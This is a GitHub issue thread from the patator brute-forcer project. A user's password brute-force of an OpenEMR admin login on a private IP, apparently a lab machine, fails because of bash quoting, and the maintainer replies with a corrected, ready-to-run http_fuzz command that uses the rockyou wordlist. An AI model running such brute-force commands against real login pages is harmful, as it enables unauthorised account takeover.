search

lanjelot / patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
GNU General Public License v2.0
3.54k stars 774 forks source link

http_fuzz word list "No such file or directory" #164

Closed davehouser1 closed 3 years ago

davehouser1 commented 3 years ago

Problem: patator http_fuzz keeps showing "-bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory", and I dont understand why.

Expected behavior: patator will use the rockyou.txt word list, brute force just the password while using "admin" for the username each round, and ignore status code 200 from the system each time.

Command:

$ patator http_fuzz url=http://192.168.131.145/openemr/interface/main/main_screen.php?auth=login&site=default \
method=POST \
body='new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FILE0&languageChoice=1' \
0=/usr/share/wordlists/rockyou.txt \
follow=1 \
accept_cookie=1 \
-x=ignore:code=200

Output:

[1] 365600
bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory
$ 12:56:50 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.8.3 at 2021-06-06 12:56 EDT
12:56:50 patator    INFO -
12:56:50 patator    INFO - code size:clen       time | candidate                          |   num | mesg
12:56:50 patator    INFO - -----------------------------------------------------------------------------
12:56:50 patator    INFO - 200  358:37         0.030 |                                    |     1 | HTTP/1.1 200 OK
12:56:50 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s

No matter what I try I see two things 1) bash: 0=/usr/share/wordlists/rockyou.txt: No such file or directory Not sure if this is related but cant tell if patator is actually using my wordlists. Confirmed that word list exists. 2) Cant tell but it seems patator is not ignoring status code 200

Burp suite: You can see that when a login is performed many GET requests are sent after the POST. Not sure if I need to craft this http_fuzz a specific way

POST with response: image

Actual page that shows status: image

So the site appears to redirect to a GET request with status code 200 for each request that fails.

What am I doing wrong here?

lanjelot commented 3 years ago

You need to quote & and learn a bit more on how to use bash :)

In the meantime try this:

patator http_fuzz url='http://192.168.131.145/openemr/interface/main/main_screen.php?auth=login&site=default' method=POST body='new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FILE0&languageChoice=1' 0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=1 -x=ignore:code=200

Good luck